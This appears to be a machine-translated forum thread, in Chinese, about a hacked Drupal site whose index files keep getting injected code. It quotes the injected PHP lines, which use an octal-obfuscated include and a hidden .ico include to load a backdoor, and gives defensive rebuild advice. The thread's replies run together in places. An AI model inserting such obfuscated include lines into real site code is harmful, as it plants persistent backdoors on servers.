Index.php/Index.html文件每天都会被注入包含代码

我的网站遭到黑客攻击，在安全更新出现问题后，从Drupal 7.3更新到7.59，但问题仍在继续。我还将服务器恢复到攻击前的状态

服务器每天都在css/js文件夹等奇怪的地方创建索引文件，但也在现有的index.php/index.html中创建索引文件，这些索引文件中包含以下代码：

<?PHP
 @include "\157\157\157\157\157\157\157\157\157\157\157\157";

---

如果我记得的话，安全问题是远程代码执行。这意味着他们可以在你的服务器上安装脚本，甚至修改你的sshd，让他们远程访问

安装一个新服务器，只恢复drupal的数据库，重新安装drupal fresh，并使用已更新的版本。然后修复网站的任何问题，注意不要从旧服务器复制文件（媒体/图像除外）

希望这能让你处于一个干净的状态。
你在黑客攻击后更新了Drupal吗？在你注意到问题之前从备份中恢复。我在攻击后更新了，是的。我还从攻击发生前的备份中恢复了。仍在生成中。请检查文件、端口、ftp、sftp、ssh的所有连接和权限，并更改所有密码。@ceejayoz超级屈尊0值响应，答案在问题中。您是否遇到过这种情况？如果没有，你能告诉我更多的信息，你是在哪里发现的或者读到的吗？感谢您的洞察力，我们正在将服务器迁移到更健壮、更安全的环境中。我没有这样做。当你在infosec领域工作时，你会看到很多折衷方案。如果您对该领域感兴趣，这是一个很好的起点：
/*79026*/
<?PHP 
   @include some-folder-name/.81abc878.ico;

/*79026*/